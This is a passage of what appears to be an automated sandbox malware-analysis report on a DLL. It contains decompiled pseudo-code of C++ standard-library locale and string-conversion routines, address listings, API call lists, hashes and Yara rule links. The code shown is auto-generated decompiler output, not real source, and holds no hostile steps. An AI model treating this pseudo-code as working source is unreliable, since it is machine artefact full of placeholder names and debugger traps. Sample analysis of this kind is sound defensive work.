																																																							E6E2200AC(0x6e2683cf, _t575, _t774, _t793, 0x14);
																																																							E6E206653(_t814 - 0x14, 0);
																																																							_t794 =  *0x6e2c6dd0; // 0x0
																																																							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																							 *(_t814 - 0x10) = _t794;
																																																							_t486 = E6E1E161C(0x6e2c6d60);
																																																							_t697 =  *((intOrPtr*)(_t814 + 8));
																																																							_t775 = E6E1E171B( *((intOrPtr*)(_t814 + 8)), _t486);
																																																							__eflags = _t775;
																																																							if(_t775 != 0) {
																																																								L124:
																																																								E6E2066BA(_t814 - 0x14);
																																																								return E6E220075(_t775);
																																																							} else {
																																																								__eflags = _t794;
																																																								if(_t794 == 0) {
																																																									_push( *((intOrPtr*)(_t814 + 8)));
																																																									_push(_t814 - 0x10);
																																																									__eflags = E6E21162A(_t575, _t697, _t756, _t775, _t794) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										_t701 = _t814 - 0x20;
																																																										E6E1E1438(_t701);
																																																										E6E223D74(_t814 - 0x20, 0x6e2c3504);
																																																										asm("int3");
																																																										E6E2200AC(0x6e26851f, _t575, _t775, _t794, 4);
																																																										_t795 = _t701;
																																																										 *(_t814 - 0x10) = _t795;
																																																										 *((intOrPtr*)(_t795 + 4)) =  *((intOrPtr*)(_t814 + 0xc));
																																																										_push( *((intOrPtr*)(_t814 + 0x14)));
																																																										_t259 = _t814 - 4;
																																																										 *_t259 =  *(_t814 - 4) & 0x00000000;
																																																										__eflags =  *_t259;
																																																										 *_t795 = 0x6e26c0c4;
																																																										 *((char*)(_t795 + 0x28)) =  *((intOrPtr*)(_t814 + 0x10));
																																																										E6E21542F(_t575, _t701, _t756, _t775, _t795,  *_t259);
																																																										return E6E220075(_t795,  *((intOrPtr*)(_t814 + 8)));
																																																									} else {
																																																										_t775 =  *(_t814 - 0x10);
																																																										 *(_t814 - 0x10) = _t775;
																																																										 *(_t814 - 4) = 1;
																																																										E6E206FD3(__eflags, _t775);
																																																										 *0x6e26a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																																										 *0x6e2c6dd0 = _t775;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t775 = _t794;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t774 =  *(_t814 - 0x10);
																																																							 *(_t814 - 0x10) = _t774;
																																																							 *(_t814 - 4) = 1;
																																																							E6E206FD3(__eflags, _t774);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																																							 *0x6e2c6e00 = _t774;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t774 = _t793;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t773 =  *(_t814 - 0x10);
																																																				 *(_t814 - 0x10) = _t773;
																																																				 *(_t814 - 4) = 1;
																																																				E6E206FD3(__eflags, _t773);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																																																				 *0x6e2c6dcc = _t773;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t773 = _t792;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t772 =  *(_t814 - 0x10);
																																																	 *(_t814 - 0x10) = _t772;
																																																	 *(_t814 - 4) = 1;
																																																	E6E206FD3(__eflags, _t772);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																																																	 *0x6e2c6dfc = _t772;
																																																	goto L103;
																																																}
																																															} else {
																																																_t772 = _t791;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t771 =  *(_t814 - 0x10);
																																														 *(_t814 - 0x10) = _t771;
																																														 *(_t814 - 4) = 1;
																																														E6E206FD3(__eflags, _t771);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																																														 *0x6e2c6de0 = _t771;
																																														goto L96;
																																													}
																																												} else {
																																													_t771 = _t790;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t770 =  *(_t814 - 0x10);
																																											 *(_t814 - 0x10) = _t770;
																																											 *(_t814 - 4) = 1;
																																											E6E206FD3(__eflags, _t770);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																																											 *0x6e2c6ddc = _t770;
																																											goto L89;
																																										}
																																									} else {
																																										_t770 = _t789;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t769 =  *(_t814 - 0x10);
																																								 *(_t814 - 0x10) = _t769;
																																								 *(_t814 - 4) = 1;
																																								E6E206FD3(__eflags, _t769);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																																								 *0x6e2c6db0 = _t769;
																																								goto L82;
																																							}
																																						} else {
																																							_t769 = _t788;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t768 =  *(_t814 - 0x10);
																																					 *(_t814 - 0x10) = _t768;
																																					 *(_t814 - 4) = 1;
																																					E6E206FD3(__eflags, _t768);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																																					 *0x6e2c6dd8 = _t768;
																																					goto L75;
																																				}
																																			} else {
																																				_t768 = _t787;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t767 =  *(_t814 - 0x10);
																																		 *(_t814 - 0x10) = _t767;
																																		 *(_t814 - 4) = 1;
																																		E6E206FD3(__eflags, _t767);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
																																		 *0x6e2c6dc4 = _t767;
																																		goto L68;
																																	}
																																} else {
																																	_t767 = _t786;
																																	goto L68;
																																}
																															}
																														} else {
																															_t766 =  *(_t814 - 0x10);
																															 *(_t814 - 0x10) = _t766;
																															 *(_t814 - 4) = 1;
																															E6E206FD3(__eflags, _t766);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
																															 *0x6e2c6dc8 = _t766;
																															goto L61;
																														}
																													} else {
																														_t766 = _t785;
																														goto L61;
																													}
																												}
																											} else {
																												_t765 =  *(_t814 - 0x10);
																												 *(_t814 - 0x10) = _t765;
																												 *(_t814 - 4) = 1;
																												E6E206FD3(__eflags, _t765);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
																												 *0x6e2c6df4 = _t765;
																												goto L54;
																											}
																										} else {
																											_t765 = _t784;
																											goto L54;
																										}
																									}
																								} else {
																									_t764 =  *(_t814 - 0x10);
																									 *(_t814 - 0x10) = _t764;
																									 *(_t814 - 4) = 1;
																									E6E206FD3(__eflags, _t764);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t764 + 4))))();
																									 *0x6e2c6df8 = _t764;
																									goto L47;
																								}
																							} else {
																								_t764 = _t783;
																								goto L47;
																							}
																						}
																					} else {
																						_t763 =  *(_t814 - 0x10);
																						 *(_t814 - 0x10) = _t763;
																						 *(_t814 - 4) = 1;
																						E6E206FD3(__eflags, _t763);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t763 + 4))))();
																						 *0x6e2c6dc0 = _t763;
																						goto L40;
																					}
																				} else {
																					_t763 = _t782;
																					goto L40;
																				}
																			}
																		} else {
																			_t762 =  *(_t814 - 0x10);
																			 *(_t814 - 0x10) = _t762;
																			 *(_t814 - 4) = 1;
																			E6E206FD3(__eflags, _t762);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t762 + 4))))();
																			 *0x6e2c6df0 = _t762;
																			goto L33;
																		}
																	} else {
																		_t762 = _t781;
																		goto L33;
																	}
																}
															} else {
																_t761 =  *(_t814 - 0x10);
																 *(_t814 - 0x10) = _t761;
																 *(_t814 - 4) = 1;
																E6E206FD3(__eflags, _t761);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t761 + 4))))();
																 *0x6e2c6dbc = _t761;
																goto L26;
															}
														} else {
															_t761 = _t780;
															goto L26;
														}
													}
												} else {
													_t760 =  *(_t814 - 0x10);
													 *(_t814 - 0x10) = _t760;
													 *(_t814 - 4) = 1;
													E6E206FD3(__eflags, _t760);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t760 + 4))))();
													 *0x6e2c6dec = _t760;
													goto L19;
												}
											} else {
												_t760 = _t779;
												goto L19;
											}
										}
									} else {
										_t759 =  *(_t814 - 0x10);
										 *(_t814 - 0x10) = _t759;
										 *(_t814 - 4) = 1;
										E6E206FD3(__eflags, _t759);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t759 + 4))))();
										 *0x6e2c6db8 = _t759;
										goto L12;
									}
								} else {
									_t759 = _t778;
									goto L12;
								}
							}
						} else {
							_t758 =  *(_t814 - 0x10);
							 *(_t814 - 0x10) = _t758;
							 *(_t814 - 4) = 1;
							E6E206FD3(__eflags, _t758);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t758 + 4))))();
							 *0x6e2c6de8 = _t758;
							goto L5;
						}
					} else {
						_t758 = _t777;
						goto L5;
					}
				}
			}




























































                          0x6e20f183
                          0x6e20f183
                          0x6e20f18a
                          0x6e20f194
                          0x6e20f199
                          0x6e20f1a4
                          0x6e20f1a8
                          0x6e20f1ab
                          0x6e20f1b0
                          0x6e20f1b4
                          0x6e20f1b9
                          0x6e20f1bd
                          0x6e20f202
                          0x6e20f205
                          0x6e20f211
                          0x6e20f1bf
                          0x6e20f1c1
                          0x6e20f1c7
                          0x6e20f1cd
                          0x6e20f1d5
                          0x6e20f1d8
                          0x6e20f215
                          0x6e20f223
                          0x6e20f228
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25f
                          0x6e20f261
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
                          0x6e20f4ad
                          0x6e20f4bb
                          0x6e20f4c0
                          0x6e20f4c8
                          0x6e20f4d2
                          0x6e20f4d7
                          0x6e20f4e2
                          0x6e20f4e6
                          0x6e20f4e9
                          0x6e20f4ee
                          0x6e20f4f7
                          0x6e20f4f9
                          0x6e20f4fb
                          0x6e20f540
                          0x6e20f543
                          0x6e20f54f
                          0x6e20f4fd
                          0x6e20f4fd
                          0x6e20f4ff
                          0x6e20f505
                          0x6e20f50b
                          0x6e20f513
                          0x6e20f516
                          0x6e20f553
                          0x6e20f561
                          0x6e20f566
                          0x6e20f56e
                          0x6e20f578
                          0x6e20f57d
                          0x6e20f588
                          0x6e20f58c
                          0x6e20f58f
                          0x6e20f594
                          0x6e20f59d
                          0x6e20f59f
                          0x6e20f5a1
                          0x6e20f5e6
                          0x6e20f5e9
                          0x6e20f5f5
                          0x6e20f5a3
                          0x6e20f5a3
                          0x6e20f5a5
                          0x6e20f5ab
                          0x6e20f5b1
                          0x6e20f5b9
                          0x6e20f5bc
                          0x6e20f5f9
                          0x6e20f607
                          0x6e20f60c
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f643
                          0x6e20f645
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b
                          0x6e20f5be
                          0x6e20f5be
                          0x6e20f5c1
                          0x6e20f5c5
                          0x6e20f5c9
                          0x6e20f5d6
                          0x6e20f5de
                          0x6e20f5e0
                          0x00000000
                          0x6e20f5e0
                          0x6e20f5a7
                          0x6e20f5a7
                          0x00000000
                          0x6e20f5a7
                          0x6e20f5a5
                          0x6e20f518
                          0x6e20f518
                          0x6e20f51b
                          0x6e20f51f
                          0x6e20f523
                          0x6e20f530
                          0x6e20f538
                          0x6e20f53a
                          0x00000000
                          0x6e20f53a
                          0x6e20f501
                          0x6e20f501
                          0x00000000
                          0x6e20f501
                          0x6e20f4ff
                          0x6e20f472
                          0x6e20f472
                          0x6e20f475
                          0x6e20f479
                          0x6e20f47d
                          0x6e20f48a
                          0x6e20f492
                          0x6e20f494
                          0x00000000
                          0x6e20f494
                          0x6e20f45b
                          0x6e20f45b
                          0x00000000
                          0x6e20f45b
                          0x6e20f459
                          0x6e20f3cc
                          0x6e20f3cc
                          0x6e20f3cf
                          0x6e20f3d3
                          0x6e20f3d7
                          0x6e20f3e4
                          0x6e20f3ec
                          0x6e20f3ee
                          0x00000000
                          0x6e20f3ee
                          0x6e20f3b5
                          0x6e20f3b5
                          0x00000000
                          0x6e20f3b5
                          0x6e20f3b3
                          0x6e20f326
                          0x6e20f326
                          0x6e20f329
                          0x6e20f32d
                          0x6e20f331
                          0x6e20f33e
                          0x6e20f346
                          0x6e20f348
                          0x00000000
                          0x6e20f348
                          0x6e20f30f
                          0x6e20f30f
                          0x00000000
                          0x6e20f30f
                          0x6e20f30d
                          0x6e20f280
                          0x6e20f280
                          0x6e20f283
                          0x6e20f287
                          0x6e20f28b
                          0x6e20f298
                          0x6e20f2a0
                          0x6e20f2a2
                          0x00000000
                          0x6e20f2a2
                          0x6e20f269
                          0x6e20f269
                          0x00000000
                          0x6e20f269
                          0x6e20f267
                          0x6e20f1da
                          0x6e20f1da
                          0x6e20f1dd
                          0x6e20f1e1
                          0x6e20f1e5
                          0x6e20f1f2
                          0x6e20f1fa
                          0x6e20f1fc
                          0x00000000
                          0x6e20f1fc
                          0x6e20f1c3
                          0x6e20f1c3
                          0x00000000
                          0x6e20f1c3
                          0x6e20f1c1

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F18A
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F194
                          • int.LIBCPMT ref: 6E20F1AB
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • messages.LIBCPMT ref: 6E20F1CE
                          • std::_Facet_Register.LIBCPMT ref: 6E20F1E5
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F205
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F223
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                          • String ID:
                          • API String ID: 438560357-0
                          • Opcode ID: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
                          • Instruction ID: 649ac8905262ea0ce9a5533c418bffb154387899aa8052279c3b24696cb4d61b
                          • Opcode Fuzzy Hash: 4ef8be90b5d1c4063d15288edfba8c8af2b1d68e7dffe051e6d5ae2129a174e1
                          • Instruction Fuzzy Hash: A511E37A90051DCFCF00DBE0C898AEEB77BBF84719F240909E4206B2D0DBB49A80C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25621F, Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E23F290,6E23F290,?,?,?,6E256470,00000001,00000001,C5E85006), ref: 6E256279
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E256470,00000001,00000001,C5E85006,?,?,?), ref: 6E2562FF
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E2563F9
                          • __freea.LIBCMT ref: 6E256406
                            • Part of subcall function 6E24F26D: RtlAllocateHeap.NTDLL(00000000,6E2075D9,00000000,?,6E220F8B,00000002,00000000,?,?,?,6E1E1298,6E2075D9,00000004,00000000,00000000,00000000), ref: 6E24F29F
                          • __freea.LIBCMT ref: 6E25640F
                          • __freea.LIBCMT ref: 6E256434
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                          • String ID:
                          • API String ID: 1414292761-0
                          • Opcode ID: 75e0b40ceb8a850b9ce6293cff7fafa412acb81fad18ac34525e3f8d70be24f7
                          • Instruction ID: c0875fdc6f949447c3dd43aeb7607c4dbc10faf2bd5cc5e17263358a06b767a1
                          • Opcode Fuzzy Hash: 75e0b40ceb8a850b9ce6293cff7fafa412acb81fad18ac34525e3f8d70be24f7
                          • Instruction Fuzzy Hash: 4251C47262021BAFEB258FE4CD90EBB77ABEB44750F154669EC14DA240DF34DC61C690
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E2423DD, Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
